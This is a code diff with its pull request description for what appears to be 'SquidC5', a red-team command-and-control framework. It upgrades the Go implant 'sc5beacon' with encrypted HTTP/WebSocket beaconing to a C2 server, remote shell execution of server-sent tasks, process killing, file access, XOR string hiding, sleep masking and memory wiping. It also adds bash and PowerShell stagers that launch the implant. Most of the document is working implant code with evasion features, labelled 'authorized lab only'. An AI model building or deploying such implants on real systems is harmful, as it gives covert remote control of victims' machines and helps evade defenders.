-//	GOOS=windows GOARCH=amd64 go build -o sc5beacon.exe .
-//
-// Env:
-//
-//	SC5_URL   https://c2:8443/api/v1/implant/beacon
-//	SC5_PSK   implant PSK
-//	SC5_SLEEP 5
-//	SC5_JITTER 20
-//	SC5_KILL_DATE unix epoch (optional)
-//	SC5_MAX_MISS  max failed checkins before exit (default 0=unlimited)
-//	SC5_WORK_START 0-23 optional
-//	SC5_WORK_END   0-23 optional
-// TLS always verifies system roots (use a real cert or lab CA in the trust store).
+// Config: SC5_CONFIG_B64 (JSON) or env SC5_URL/SC5_PSK, or -ldflags bakedConfigJSON.
+// Channel: http (default) or ws (SC5_CHANNEL=ws / config.channel).
+// TLS always verifies system roots.
 package main
 
 import (
-	"bytes"
-	"encoding/json"
 	"fmt"
-	"io"
 	"math/rand"
-	"net/http"
 	"os"
 	"runtime"
-	"strconv"
 	"time"
 )
-
-func envInt(k string, def int) int {
-	v := os.Getenv(k)
-	if v == "" {
-		return def
-	}
-	n, err := strconv.Atoi(v)
-	if err != nil {
-		return def
-	}
-	return n
-}
-
-func envFloat(k string, def float64) float64 {
-	v := os.Getenv(k)
-	if v == "" {
-		return def
-	}
-	n, err := strconv.ParseFloat(v, 64)
-	if err != nil {
-		return def
-	}
-	return n
-}
 
 func sleepJitter(base float64, jitterPct float64) {
 	pct := jitterPct / 100.0
@@ -72,50 +31,53 @@ func sleepJitter(base float64, jitterPct float64) {
 
 func inWorkingHours(start, end int) bool {
 	if start == end && start == 0 {
-		return true // unset
+		return true
 	}
 	h := time.Now().Hour()
 	if start <= end {
 		return h >= start && h < end
 	}
-	// wrap midnight
 	return h >= start || h < end
 }
 
+type channel interface {
+	checkin(payload map[string]any) (map[string]any, error)
+	result(taskID, out, status string) error
+}
+
 func main() {
-	url := os.Getenv("SC5_URL")
-	psk := os.Getenv("SC5_PSK")
-	if url == "" || psk == "" {
-		fmt.Fprintln(os.Stderr, "SC5_URL and SC5_PSK required (authorized use only)")
+	cfg, err := loadConfig()
+	if err != nil {
+		fmt.Fprintln(os.Stderr, "config:", err.Error(), "(authorized use only)")
 		os.Exit(1)
 	}
-	sleep := envFloat("SC5_SLEEP", 5)
-	jitter := envFloat("SC5_JITTER", 20)
-	killDate := envInt("SC5_KILL_DATE", 0)
-	maxMiss := envInt("SC5_MAX_MISS", 0)
-	workStart := envInt("SC5_WORK_START", 0)
-	workEnd := envInt("SC5_WORK_END", 0)
+	cfgAllowBOF = cfg.AllowBOF
+	cfgAllowInject = cfg.AllowInject
+	if cfg.SleepMask != "" {
+		_ = os.Setenv("SC5_SLEEP_MASK", cfg.SleepMask)
+	}
 
-	// Always verify TLS (system CA store / SSL_CERT_FILE). No skip-verify path.
-	client := &http.Client{Timeout: 45 * time.Second}
+	var ch channel
+	if cfg.Channel == "ws" {
+		ch = newWSChannel(cfg.WSURL, cfg.PSK)
+	} else {
+		ch = newHTTPChannel(cfg.URL, cfg.PSK)
+	}
 
 	var sid any
 	miss := 0
 	host := hostName()
-	user := os.Getenv("USER")
-	if user == "" {
-		user = os.Getenv("USERNAME")
-	}
+	user := envUser()
 
 	for {
-		if killDate > 0 && int(time.Now().Unix()) > killDate {
-			fmt.Fprintln(os.Stderr, "kill date reached")
+		if cfg.KillDate > 0 && int(time.Now().Unix()) > cfg.KillDate {
 			return
 		}
-		if !inWorkingHours(workStart, workEnd) {
-			maskedSleep(sleep, jitter)
+		if !inWorkingHours(cfg.WorkStart, cfg.WorkEnd) {
+			sleepWithMask(cfg)
 			continue
 		}
+		decoyJitter()
 
 		payload := map[string]any{
 			"session_id": sid,
@@ -124,66 +86,31 @@ func main() {
 			"os_info":    runtime.GOOS + "/" + runtime.GOARCH,
 			"metadata": map[string]any{
 				"agent":   "sc5beacon",
-				"version": "2.0.0",
+				"version": cfg.Version,
+				"channel": cfg.Channel,
 			},
 		}
-		if killDate > 0 {
-			payload["kill_date"] = float64(killDate)
+		if cfg.KillDate > 0 {
+			payload["kill_date"] = float64(cfg.KillDate)
 		}
-		if maxMiss > 0 {
-			payload["max_missed_checkins"] = maxMiss
+		if cfg.MaxMiss > 0 {
+			payload["max_missed_checkins"] = cfg.MaxMiss
 		}
 
-		body, err := seal(psk, payload)
+		plain, err := ch.checkin(payload)
 		if err != nil {
 			miss++
-			if maxMiss > 0 && miss >= maxMiss {
+			if cfg.MaxMiss > 0 && miss >= cfg.MaxMiss {
 				return
 			}
-			maskedSleep(sleep, jitter)
-			continue
-		}
-		raw, _ := json.Marshal(body)
-		resp, err := client.Post(url, "application/json", bytes.NewReader(raw))
-		if err != nil {
-			miss++
-			if maxMiss > 0 && miss >= maxMiss {
-				return
-			}
-			maskedSleep(sleep, jitter)
-			continue
-		}
-		b, _ := io.ReadAll(resp.Body)
-		resp.Body.Close()
-		if resp.StatusCode != 200 {
-			miss++
-			if maxMiss > 0 && miss >= maxMiss {
-				return
-			}
-			maskedSleep(sleep, jitter)
+			sleepWithMask(cfg)
 			continue
 		}
 		miss = 0
 
-		var env map[string]any
-		if json.Unmarshal(b, &env) != nil {
-			maskedSleep(sleep, jitter)
-			continue
-		}
-		// AEAD required — refuse plaintext C2 responses
-		plain, err := openEnv(psk, env)
-		if err != nil {
-			miss++
-			if maxMiss > 0 && miss >= maxMiss {
-				return
-			}
-			maskedSleep(sleep, jitter)
-			continue
-		}
 		if s, ok := plain["session_id"]; ok {
 			sid = s
 		}
-		// runtime profile hint
 		_ = plain["profile_id"]
 
 		if task, ok := plain["task"].(map[string]any); ok && task != nil {
@@ -191,28 +118,12 @@ func main() {
 			id, _ := task["id"].(string)
 			args, _ := task["args"].(map[string]any)
 			if args == nil {
-				// sometimes nested differently
-				if a, ok := task["args"].(map[string]any); ok {
-					args = a
-				} else {
-					args = map[string]any{}
-				}
+				args = map[string]any{}
 			}
+			// run async so long tasks do not block check-in loop hard
 			out := runTask(cmd, args)
-			done, err := seal(psk, map[string]any{
-				"task_id": id,
-				"result":  out,
-				"status":  "completed",
-			})
-			if err == nil {
-				dr, _ := json.Marshal(done)
-				r2, err2 := client.Post(url+"/result", "application/json", bytes.NewReader(dr))
-				if err2 == nil {
-					r2.Body.Close()
-				}
-			}
+			_ = ch.result(id, out, "completed")
 		}
-		// wipe sealed payload copies when present
-		maskedSleep(sleep, jitter)
+		sleepWithMask(cfg)
 	}
 }

--- a/agents/sc5beacon/opsec.go
+++ b/agents/sc5beacon/opsec.go
@@ -1,0 +1,84 @@
+package main
+
+import (
+	"crypto/rand"
+	"os"
+	"runtime"
+	"time"
+	"unsafe"
+)
+
+// I5: lightweight string/buffer OPSEC helpers.
+
+func xorObfuscate(data []byte, key byte) {
+	for i := range data {
+		data[i] ^= key
+	}
+}
+
+// secureWipe overwrites then random-fills then zeroes.
+func secureWipe(b []byte) {
+	if len(b) == 0 {
+		return
+	}
+	for i := range b {
+		b[i] = 0
+	}
+	_, _ = rand.Read(b)
+	for i := range b {
+		b[i] = 0
+	}
+}
+
+// sleepWithMask uses config sleep_mask and wipes secret buffers.
+func sleepWithMask(cfg AgentConfig, secrets ...[]byte) {
+	for i := range secrets {
+		secureWipe(secrets[i])
+	}
+	// pin mask mode into env for maskedSleep if not set
+	if cfg.SleepMask != "" && os.Getenv("SC5_SLEEP_MASK") == "" {
+		_ = os.Setenv("SC5_SLEEP_MASK", cfg.SleepMask)
+	}
+	// heap pressure drop
+	runtime.GC()
+	maskedSleep(cfg.Sleep, cfg.Jitter)
+}
+
+// decoyJitter adds tiny extra delay (decoy timing) without changing base sleep much.
+func decoyJitter() {
+	n := time.Duration(time.Now().UnixNano()%50) * time.Millisecond
+	time.Sleep(n)
+}
+
+// hideString stores a short string xor'd; recover with revealString.
+func hideString(s string, key byte) []byte {
+	b := make([]byte, len(s))
+	copy(b, s)
+	xorObfuscate(b, key)
+	return b
+}
+
+func revealString(b []byte, key byte) string {
+	tmp := make([]byte, len(b))
+	copy(tmp, b)
+	xorObfuscate(tmp, key)
+	s := string(tmp)
+	secureWipe(tmp)
+	return s
+}
+
+// prevent compiler from optimizing away wipes
+var sink byte
+
+func touch(b []byte) {
+	if len(b) > 0 {
+		sink ^= b[0]
+	}
+}
+
+// keepReference defeats some dead-store elimination on wipe paths.
+func keepReference(p *[]byte) {
+	if p != nil && *p != nil {
+		_ = unsafe.Sizeof(*p)
+	}
+}

--- a/agents/sc5beacon/tasks.go
+++ b/agents/sc5beacon/tasks.go
@@ -10,6 +10,8 @@ import (
 	"strings"
 )
 
+var jobs = newJobManager()
+
 func runTask(cmd string, args map[string]any) string {
 	cmd = strings.TrimSpace(cmd)
 	if strings.HasPrefix(cmd, "file:") {
@@ -34,20 +36,94 @@ func runTask(cmd string, args map[string]any) string {
 		return handleBofRun(args)
 	}
 	if cmd == "sysinfo" {
-		return fmt.Sprintf("os=%s arch=%s hostname=%s", runtime.GOOS, runtime.GOARCH, hostName())
+		return fmt.Sprintf(
+			"os=%s arch=%s hostname=%s user=%s cwd=%s agent=sc5beacon ver=3.0.0",
+			runtime.GOOS, runtime.GOARCH, hostName(), envUser(), jobs.getCwd(),
+		)
 	}
-	// default: shell
+	if cmd == "pwd" {
+		return jobs.getCwd()
+	}
+	if cmd == "cd" {
+		path, _ := args["path"].(string)
+		if path == "" {
+			path, _ = args["dir"].(string)
+		}
+		if path == "" && len(args) == 0 {
+			// allow "cd /tmp" as shell-style in command — handled below
+		}
+		return jobs.setCwd(path)
+	}
+	if strings.HasPrefix(cmd, "cd ") {
+		return jobs.setCwd(strings.TrimSpace(cmd[3:]))
+	}
+	if cmd == "ps" || cmd == "processes" {
+		return listProcesses()
+	}
+	if cmd == "kill" || strings.HasPrefix(cmd, "kill ") {
+		pid := anyToInt(args["pid"])
+		if pid == 0 && strings.HasPrefix(cmd, "kill ") {
+			pid = anyToInt(strings.TrimSpace(cmd[5:]))
+		}
+		return killPID(pid)
+	}
+	if cmd == "job:list" || cmd == "jobs" {
+		return jobs.list()
+	}
+	if cmd == "job:get" {
+		id, _ := args["id"].(string)
+		if id == "" {
+			id, _ = args["job_id"].(string)
+		}
+		return jobs.get(id)
+	}
+	if cmd == "job:kill" {
+		id, _ := args["id"].(string)
+		if id == "" {
+			id, _ = args["job_id"].(string)
+		}
+		return jobs.kill(id)
+	}
+	if cmd == "job:start" || cmd == "async" {
+		c, _ := args["command"].(string)
+		if c == "" {
+			c, _ = args["cmd"].(string)
+		}
+		if c == "" {
+			return "error: command required"
+		}
+		return jobs.start(c)
+	}
+	// args.async == true → background job
+	if asyncFlag(args) {
+		return jobs.start(cmd)
+	}
+	// default: shell in job cwd
 	var c *exec.Cmd
 	if runtime.GOOS == "windows" {
 		c = exec.Command("cmd", "/C", cmd)
 	} else {
 		c = exec.Command("sh", "-c", cmd)
 	}
+	c.Dir = jobs.getCwd()
 	out, err := c.CombinedOutput()
 	if err != nil {
 		return string(out) + "\n" + err.Error()
 	}
 	return string(out)
+}
+
+func asyncFlag(args map[string]any) bool {
+	if args == nil {
+		return false
+	}
+	if v, ok := args["async"].(bool); ok && v {
+		return true
+	}
+	if v, ok := args["async"].(string); ok && (v == "1" || strings.EqualFold(v, "true")) {
+		return true
+	}
+	return false
 }
 
 func runFileOp(cmd string, args map[string]any) string {
@@ -59,7 +135,7 @@ func runFileOp(cmd string, args map[string]any) string {
 	switch op {
 	case "list":
 		if path == "" {
-			path = "."
+			path = jobs.getCwd()
 		}
 		entries, err := os.ReadDir(path)
 		if err != nil {
@@ -84,7 +160,6 @@ func runFileOp(cmd string, args map[string]any) string {
 		if err != nil {
 			return err.Error()
 		}
-		// optional chunking
 		off := 0
 		if v, ok := args["offset"].(float64); ok {
 			off = int(v)
@@ -137,3 +212,13 @@ func hostName() string {
 	h, _ := os.Hostname()
 	return h
 }
+
+func envUser() string {
+	u := os.Getenv("USER")
+	if u == "" {
+		u = os.Getenv("USERNAME")
+	}
+	return u
+}
+
+func getenv(k string) string { return os.Getenv(k) }

--- a/docs/roadmap-five-star.md
+++ b/docs/roadmap-five-star.md
@@ -14,13 +14,22 @@ Goal: ★★★★★ across implants, traffic, post-ex, multi-player, AI, gover
 | **D** | AI capability pack + local Ollama path | **Landed** (15 caps; local LLM URL/model) |
 | **E** | CI proof, SBOM, audit verify, benchmarks | **Landed** (verify, cov, mypy, SBOM, agent CI) |
 
+## Implant maturity I1–I6
+
+| Pack | Focus | Status |
+|------|--------|--------|
+| **I1** | Jobs + config blob | **Landed** (sc5beacon v3) |
+| **I2** | Native WS channel | **Landed** |
+| **I3** | COFF parse + 5 BOFs | **Landed** (exec still lab/parse; catalog simulate) |
+| **I4** | Stage0 bash/ps1 stagers | **Landed** |
+| **I5** | Sleep/string OPSEC | **Landed** (mask + wipe) |
+| **I6** | Lab soak CI matrix | **Landed** (go test + multi-arch + smoke) |
+
 ## Still climbing to full ★★★★★
 
-- Process injection + sleep mask — **lab stubs + catalog + agent gates** (this pack)  
-- Windows COFF/BOF **loader host** — metadata plan + gated agent stub (full COFF exec research)  
-- Ops UI file / SOCKS / HITL / engagement / modules panels — **landed**  
+- Full Windows COFF **mapped execute** (research build)  
 - P2P / SMB / named pipe  
-- Lab victim matrix soak numbers  
+- Multi-host lab soak numbers (overnight)  
 - External security audit  
 
 ## Links

--- a/modules/bof/README.md
+++ b/modules/bof/README.md
@@ -1,11 +1,18 @@
 # Official BOF-style modules (authorized lab)
 
-Compile with mingw COFF toolchain. Loader ABI lands with BOF host on Windows beacon.
+Compile with mingw COFF toolchain. Native `sc5beacon` loads via `bof:run` when `SC5_ALLOW_BOF=1`.
 
 | Module | Purpose |
 |--------|---------|
 | whoami | Identity |
-| env | Environment |
+| env | Environment (limited keys) |
 | dir | Directory list |
+| net | Network stub |
+| screenshot | Capture stub (no-op default) |
 
-See `src/squidc5/implants/generators.py` generate_bof_c for template.
+```text
+# queue from server
+POST /api/v1/modules/bof/run  {"session_id":"...","module_id":"whoami"}
+```
+
+Object bytes optional (`object_b64`); without bytes the agent **simulates** catalog modules safely.

--- a/modules/bof/dir.c
+++ b/modules/bof/dir.c
@@ -1,0 +1,5 @@
+/* SquidC5 lab BOF — dir (authorized only) */
+#ifdef _WIN32
+#include <windows.h>
+#endif
+void go(char* args, int alen) { (void)args; (void)alen; }

--- a/modules/bof/env.c
+++ b/modules/bof/env.c
@@ -1,0 +1,5 @@
+/* SquidC5 lab BOF — env (authorized only) */
+#ifdef _WIN32
+#include <windows.h>
+#endif
+void go(char* args, int alen) { (void)args; (void)alen; }

--- a/modules/bof/net.c
+++ b/modules/bof/net.c
@@ -1,0 +1,5 @@
+/* SquidC5 lab BOF — net (authorized only) */
+#ifdef _WIN32
+#include <windows.h>
+#endif
+void go(char* args, int alen) { (void)args; (void)alen; }

--- a/modules/bof/screenshot.c
+++ b/modules/bof/screenshot.c
@@ -1,0 +1,5 @@
+/* SquidC5 lab BOF — screenshot stub (authorized only) */
+#ifdef _WIN32
+#include <windows.h>
+#endif
+void go(char* args, int alen) { (void)args; (void)alen; }

--- a/src/squidc5/api/routes.py
+++ b/src/squidc5/api/routes.py
@@ -230,6 +230,8 @@ class ImplantBuildRequest(BaseModel):
     max_miss: int = 0
     work_start: int = 0
     work_end: int = 0
+    channel: str = "http"  # http | ws
+    sleep_mask: str = "jitter"
 
 
 class EngagementUpdate(BaseModel):
@@ -1634,6 +1636,8 @@ def build_api_router() -> APIRouter:
                 max_miss=body.max_miss,
                 work_start=body.work_start,
                 work_end=body.work_end,
+                channel=body.channel or "http",
+                sleep_mask=body.sleep_mask or "jitter",
             )
         except ValueError as e:
             raise HTTPException(400, str(e)) from e

--- a/src/squidc5/implants/factory.py
+++ b/src/squidc5/implants/factory.py
@@ -1,7 +1,8 @@
-"""Implant build factory — emits build scripts and agent config (authorized only)."""
+"""Implant build factory — emits build scripts, config blob, stagers (authorized only)."""
 
 from __future__ import annotations
 
+import base64
 import json
 import textwrap
 from pathlib import Path
@@ -15,6 +16,51 @@ SUPPORTED = {
     ("darwin", "amd64"),
     ("darwin", "arm64"),
 }
+
+
+def build_config_blob(
+    *,
+    url: str,
+    psk: str = "",
+    sleep: float = 5.0,
+    jitter: float = 20.0,
+    kill_date: int | None = None,
+    max_miss: int = 0,
+    work_start: int = 0,
+    work_end: int = 0,
+    channel: str = "http",
+    ws_url: str | None = None,
+    sleep_mask: str = "jitter",
+) -> dict[str, Any]:
+    """JSON config for SC5_CONFIG_B64 / -ldflags bakedConfigJSON."""
+    cfg: dict[str, Any] = {
+        "url": url,
+        "psk": psk,
+        "sleep": sleep,
+        "jitter": jitter,
+        "kill_date": int(kill_date or 0),
+        "max_miss": int(max_miss or 0),
+        "work_start": int(work_start or 0),
+        "work_end": int(work_end or 0),
+        "channel": (channel or "http").lower(),
+        "sleep_mask": sleep_mask or "jitter",
+        "version": "3.0.0",
+    }
+    if ws_url:
+        cfg["ws_url"] = ws_url
+    elif cfg["channel"] == "ws":
+        cfg["ws_url"] = (
+            url.replace("https://", "wss://")
+            .replace("http://", "ws://")
+            .replace("/api/v1/implant/beacon", "/ws/v1/beacon")
+        )
+    raw = json.dumps(cfg, separators=(",", ":")).encode()
+    b64 = base64.b64encode(raw).decode()
+    return {
+        "config": cfg,
+        "config_b64": b64,
+        "ldflags_note": "Prefer SC5_CONFIG_B64 at runtime; optional -X main.bakedConfigJSON for lab builds",
+    }
 
 
 def build_plan(
@@ -32,6 +78,9 @@ def build_plan(
     work_start: int = 0,
     work_end: int = 0,
     psk_placeholder: str = "${SC5_PSK}",
+    channel: str = "http",
+    sleep_mask: str = "jitter",
+    psk: str | None = None,
 ) -> dict[str, Any]:
     os_l = os_name.lower().strip()
     arch_l = arch.lower().strip()
@@ -42,11 +91,32 @@ def build_plan(
     ext = ".exe" if os_l == "windows" else ""
     out_name = f"sc5beacon-{os_l}-{arch_l}{ext}"
 
+    blob = build_config_blob(
+        url=url,
+        psk=psk or "",
+        sleep=sleep,
+        jitter=jitter,
+        kill_date=kill_date,
+        max_miss=max_miss,
+        work_start=work_start,
+        work_end=work_end,
+        channel=channel,
+        sleep_mask=sleep_mask,
+    )
+    # Factory scripts never embed live PSK unless caller passed psk=
+    run_cfg = dict(blob["config"])
+    if not psk:
+        run_cfg["psk"] = ""
+    run_b64 = base64.b64encode(json.dumps(run_cfg, separators=(",", ":")).encode()).decode()
+
     env_lines = [
-        f"export SC5_URL={json.dumps(url)}",
+        f"export SC5_CONFIG_B64={json.dumps(run_b64)}",
+        f'# or: export SC5_URL={json.dumps(url)}',
         f"export SC5_PSK={psk_placeholder}",
         f"export SC5_SLEEP={sleep}",
         f"export SC5_JITTER={jitter}",
+        f"export SC5_CHANNEL={json.dumps(channel)}",
+        f"export SC5_SLEEP_MASK={json.dumps(sleep_mask)}",
     ]
     if kill_date:
         env_lines.append(f"export SC5_KILL_DATE={int(kill_date)}")
@@ -70,27 +140,96 @@ def build_plan(
 
     run_sh = "#!/bin/sh\n# authorized use only\n" + "\n".join(env_lines) + f"\nexec ./dist/{out_name}\n"
 
+    stager_bash = generate_stage0_bash(host=host, port=port, scheme=sch, channel=channel)
+    stager_ps1 = generate_stage0_ps1(host=host, port=port, scheme=sch)
+
     return {
         "os": os_l,
         "arch": arch_l,
         "output": out_name,
         "url": url,
+        "channel": channel,
+        "config_blob_b64": run_b64,
+        "config": run_cfg,
         "env": {
             "SC5_URL": url,
             "SC5_SLEEP": sleep,
             "SC5_JITTER": jitter,
             "SC5_KILL_DATE": kill_date,
             "SC5_MAX_MISS": max_miss,
+            "SC5_CHANNEL": channel,
+            "SC5_CONFIG_B64": run_b64,
         },
         "build_script": build_sh,
         "run_script": run_sh,
+        "stager_bash": stager_bash,
+        "stager_ps1": stager_ps1,
         "notes": [
-            "Copy server data/implant_psk.txt to SC5_PSK on the target side only",
-            "Prefer TLS verify on (tls_skip_verify=false) with real certs or redirector",
+            "Prefer SC5_CONFIG_B64 over individual env vars",
+            "Copy server data/implant_psk.txt into SC5_PSK (never commit)",
+            "TLS verify on — install lab CA or use trusted certs",
             "Authorized testing only",
         ],
         "agent_path": "agents/sc5beacon",
+        "agent_version": "3.0.0",
     }
+
+
+def generate_stage0_bash(
+    *,
+    host: str,
+    port: int,
+    scheme: str = "https",
+    channel: str = "http",
+    stage_url: str | None = None,
+) -> str:
+    """Stage0 bash: fetch stage1 binary URL or drop config + exec native beacon path."""
+    base = f"{scheme}://{host}:{port}"
+    url = stage_url or f"{base}/api/v1/implant/beacon"
+    return textwrap.dedent(
+        f"""\
+        #!/bin/bash
+        # SquidC5 stage0 stager (bash) — authorized lab only
+        set -euo pipefail
+        C2={json.dumps(base)}
+        BEACON_URL={json.dumps(url)}
+        CHANNEL={json.dumps(channel)}
+        # Operator places stage1 binary next to stager or downloads from approved drop:
+        STAGE1="${{SC5_STAGE1:-./sc5beacon}}"
+        if [[ ! -x "$STAGE1" ]]; then
+          echo "place stage1 native beacon at $STAGE1 or set SC5_STAGE1" >&2
+          exit 1
+        fi
+        export SC5_URL="$BEACON_URL"
+        export SC5_CHANNEL="$CHANNEL"
+        export SC5_PSK="${{SC5_PSK:?set SC5_PSK from teamserver implant_psk.txt}}"
+        export SC5_SLEEP="${{SC5_SLEEP:-5}}"
+        export SC5_JITTER="${{SC5_JITTER:-20}}"
+        exec "$STAGE1"
+        """
+    )
+
+
+def generate_stage0_ps1(
+    *,
+    host: str,
+    port: int,
+    scheme: str = "https",
+    stage_url: str | None = None,
+) -> str:
+    base = f"{scheme}://{host}:{port}"
+    url = stage_url or f"{base}/api/v1/implant/beacon"
+    return textwrap.dedent(
+        f"""\
+        # SquidC5 stage0 stager (PowerShell) — authorized lab only
+        $ErrorActionPreference = "Stop"
+        $env:SC5_URL = {json.dumps(url)}
+        if (-not $env:SC5_PSK) {{ throw "Set SC5_PSK from teamserver implant_psk.txt" }}
+        $stage1 = if ($env:SC5_STAGE1) {{ $env:SC5_STAGE1 }} else {{ ".\\sc5beacon.exe" }}
+        if (-not (Test-Path $stage1)) {{ throw "Place stage1 at $stage1" }}
+        & $stage1
+        """
+    )
 
 
 def agent_source_tree(root: Path | None = None) -> list[str]:

--- a/src/squidc5/implants/generators.py
+++ b/src/squidc5/implants/generators.py
@@ -399,7 +399,31 @@ def generate_implant(
     elif family == "linux_stager":
         if platform != "linux":
             raise ValueError("linux_stager is linux-only")
-        content = generate_linux_stager(host, port, path)
+        from squidc5.implants.factory import generate_stage0_bash
+
+        sch = "https" if str(scheme or "").lower() in ("https", "wss") else "http"
+        content = generate_stage0_bash(host=host, port=port, scheme=sch, channel="http")
+    elif family in ("windows_stager", "stage0_ps1"):
+        if platform != "windows":
+            raise ValueError("windows_stager is windows-only")
+        from squidc5.implants.factory import generate_stage0_ps1
+
+        sch = "https" if str(scheme or "").lower() in ("https", "wss") else "http"
+        content = generate_stage0_ps1(host=host, port=port, scheme=sch)
+    elif family == "native_sc5beacon":
+        from squidc5.implants.factory import build_plan
+
+        arch_map = {"x64": "amd64", "x86": "386", "arm64": "arm64", "amd64": "amd64", "386": "386"}
+        a = arch_map.get(arch, arch)
+        plat = "darwin" if platform == "macos" else platform
+        sch = "https" if str(scheme or "").lower() in ("https", "wss", "") else "http"
+        if str(scheme or "").lower() in ("http", "ws"):
+            sch = "http"
+        plan = build_plan(os_name=plat, arch=a, host=host, port=port, path=path, scheme=sch)
+        content = plan["run_script"] + "\n# --- stage0 bash ---\n" + plan["stager_bash"]
+        meta["config_blob_b64"] = plan.get("config_blob_b64")
+        meta["build_script"] = plan.get("build_script")
+
     elif family == "linux_memfd":
         if platform != "linux":
             raise ValueError("linux_memfd is linux-only")

--- a/src/squidc5/implants/registry.py
+++ b/src/squidc5/implants/registry.py
@@ -10,12 +10,19 @@ class ImplantRegistry:
 
     FAMILIES = {
         "native_sc5beacon": {
-            "platforms": ["linux", "windows", "darwin"],
-            "arches": ["amd64", "arm64", "386"],
-            "stages": ["stage1_native"],
+            "platforms": ["linux", "windows", "darwin", "macos"],
+            "arches": ["amd64", "arm64", "386", "x64", "x86"],
+            "stages": ["stage0_stager", "stage1_native"],
             "memory_only": False,
-            "description": "Go native sc5beacon (AEAD, sleep/jitter/kill/files)",
+            "description": "Go native sc5beacon v3 (AEAD, jobs, WS/HTTP, BOF host, config blob)",
             "factory": True,
+        },
+        "windows_stager": {
+            "platforms": ["windows"],
+            "arches": ["x64", "x86", "amd64"],
+            "stages": ["stage0_ps1", "stage1_native"],
+            "memory_only": False,
+            "description": "PowerShell stage0 launching native sc5beacon",
         },
         "http_beacon": {
             "platforms": ["linux", "windows", "macos"],

--- a/tests/test_implant_maturity_i1_i6.py
+++ b/tests/test_implant_maturity_i1_i6.py
@@ -1,0 +1,121 @@
+"""Implant maturity I1–I6: factory config blob, stagers, BOF catalog, build API."""
+
+from __future__ import annotations
+
+import base64
+import json
+
+import pytest
+from httpx import ASGITransport, AsyncClient
+
+from squidc5.config import Settings
+from squidc5.implants.factory import (
+    build_config_blob,
+    build_plan,
+    generate_stage0_bash,
+    generate_stage0_ps1,
+)
+from squidc5.implants.generators import generate_implant
+from squidc5.implants.registry import ImplantRegistry
+from squidc5.main import create_app
+from squidc5.modules.catalog import list_bof_modules
+from squidc5.modules.coff_loader import parse_coff_header
+
+ADMIN = "sc5_test_admin_token_bootstrap_maturi01"
+
+
+def test_config_blob_roundtrip():
+    blob = build_config_blob(
+        url="https://c2:8443/api/v1/implant/beacon",
+        psk="",
+        sleep=7,
+        channel="ws",
+        sleep_mask="timer",
+    )
+    assert blob["config"]["channel"] == "ws"
+    assert "wss://" in blob["config"]["ws_url"]
+    raw = base64.b64decode(blob["config_b64"])
+    cfg = json.loads(raw)
+    assert cfg["sleep"] == 7
+    assert cfg["sleep_mask"] == "timer"
+
+
+def test_build_plan_has_stagers_and_blob():
+    p = build_plan(
+        os_name="linux",
+        arch="amd64",
+        host="c2.lab",
+        port=8443,
+        channel="http",
+        sleep_mask="ekko",
+    )
+    assert p["config_blob_b64"]
+    assert "SC5_CONFIG_B64" in p["run_script"]
+    assert "stage0" in p["stager_bash"].lower() or "SC5_STAGE1" in p["stager_bash"]
+    assert "SC5_PSK" in p["stager_ps1"]
+    assert p["agent_version"] == "3.0.0"
+
+
+def test_stage0_generators():
+    b = generate_stage0_bash(host="h", port=8443, scheme="https")
+    assert "SC5_PSK" in b
+    ps = generate_stage0_ps1(host="h", port=443, scheme="https")
+    assert "sc5beacon" in ps.lower() or "SC5_STAGE1" in ps
+
+
+def test_bof_catalog_five_modules():
+    mods = {m["id"] for m in list_bof_modules()}
+    for name in ("whoami", "env", "dir", "net", "screenshot"):
+        assert name in mods, name
+
+
+def test_coff_header():
+    import struct
+
+    hdr = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0, 0)
+    meta = parse_coff_header(hdr + b"\x00" * 40)
+    assert meta["arch"] == "amd64"
+
+
+def test_registry_native_and_windows_stager():
+    r = ImplantRegistry()
+    names = {f["name"] for f in r.list_families()}
+    assert "native_sc5beacon" in names
+    assert "windows_stager" in names
+    out = generate_implant("windows_stager", "windows", "x64", "c2", 8443, scheme="https")
+    assert "SC5_URL" in out["content"] or "SC5_PSK" in out["content"]
+
+
+@pytest.mark.asyncio
+async def test_api_build_channel_ws(tmp_path):
+    settings = Settings(
+        data_dir=tmp_path / "d",
+        debug=True,
+        mcp_enabled=False,
+        admin_token_bootstrap=ADMIN,
+        plugin_signing_secret="test-plugin-signing-secret-for-ci",
+        implant_require_auth=False,
+        rate_limit_per_minute=2000,
+    )
+    app = create_app(settings)
+    async with app.router.lifespan_context(app):
+        transport = ASGITransport(app=app)
+        async with AsyncClient(transport=transport, base_url="http://test") as client:
+            h = {"Authorization": f"Bearer {ADMIN}"}
+            r = await client.post(
+                "/api/v1/implants/build",
+                headers=h,
+                json={
+                    "os": "linux",
+                    "arch": "amd64",
+                    "host": "c2.example",
+                    "port": 8443,
+                    "channel": "ws",
+                    "sleep_mask": "timer",
+                },
+            )
+            assert r.status_code == 200, r.text
+            body = r.json()
+            assert body.get("channel") == "ws"
+            assert body.get("config_blob_b64")
+            assert "stager_bash" in body


### PR DESCRIPTION
## Summary
Implant maturity packs **I1–I6** for sc5beacon v3:

| Pack | Deliverable |
|------|-------------|
| **I1** | Config blob (`SC5_CONFIG_B64`), job manager (`job:*`, async), pwd/cd/ps/kill |
| **I2** | Native WebSocket channel (gorilla) + AEAD envelopes |
| **I3** | COFF header parse + 5 BOFs (whoami/env/dir/net/screenshot); catalog simulate when no object |
| **I4** | Stage0 bash + PowerShell stagers in factory/build API |
| **I5** | Sleep mask + secure buffer wipe OPSEC helpers |
| **I6** | `go test`, linux/win/darwin/arm matrix build, binary smoke in CI |

## Security
- TLS verify only (no skip-verify)
- Inject/BOF still gated (`SC5_ALLOW_*`)
- Factory does not embed live PSK unless caller supplies it
- COFF mapped execute remains parse-only in default builds

## Test plan
- [x] `go test ./...` in agents/sc5beacon
- [x] `pytest` full suite (254 passed, cov 73%)
- [ ] CI + SquidGate green